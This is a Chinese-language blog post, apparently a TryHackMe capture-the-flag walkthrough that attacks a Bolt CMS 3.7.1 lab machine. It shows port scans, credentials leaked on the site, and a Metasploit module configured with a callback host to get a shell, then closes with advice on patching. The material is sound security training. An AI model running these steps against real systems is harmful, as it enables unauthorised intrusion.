今天再来试玩一个 Try Hack Me 上面的简单题目,攻打一个 CMS (Content Management System ) 的服务。
rustscan -a 10.10.51.13
nmap -A -p22,80,8000 10.10.51.13
Bolt
的页面bolt
boltadmin123
Bolt 3.7.1
msfconsole
进入 metasploitsearch bolt
use 0
show options
PASSWORD
, USERNAME
, RHOSTS
, LHOST
等必填栏位set PASSWORD password
set USERNAME bolt
set RHOSTS 10.10.51.13
set LHOST tun0
tun0
代表我使用网卡代号 tun0
的 IP (VPN)show options
exploit
ls
这个题目告诉了我们,网页不一定开在 80 / 443 Port;我们可以透过 CMS 上面的蛛丝马迹寻找帐号跟密码的线索;不要耍白ㄘ的把密码给 Po 到网路上。再来就是可以透过网路上的资源寻找後台、版本等;待蒐集完备後,就可以开始寻找攻击方式。今天与昨天的内容都提醒了我们,当软件有重大更新时,一定要马上的做更新,以避免攻击。
大家好,希望大家今天是快乐的o(≧∀≦)o不开心的话就来看看我的文章吧~ 今天要讲的是监听器watc...
缘由: UIUX提出说想让App使用者的手机可以一直亮着,不会自动锁屏,虽然心里知道是有可能的,但没...
这 30 天我们整理了许多 Python 的基本语法,包括了基本的输入输出、if 判断式、while...
在填完上篇所说的资料後,次级资料是用之前资料所计算出来的,虽然前面的文章都说过了,这边再整理一下。 ...
What is JavaScript? HTML is like the structure/bon...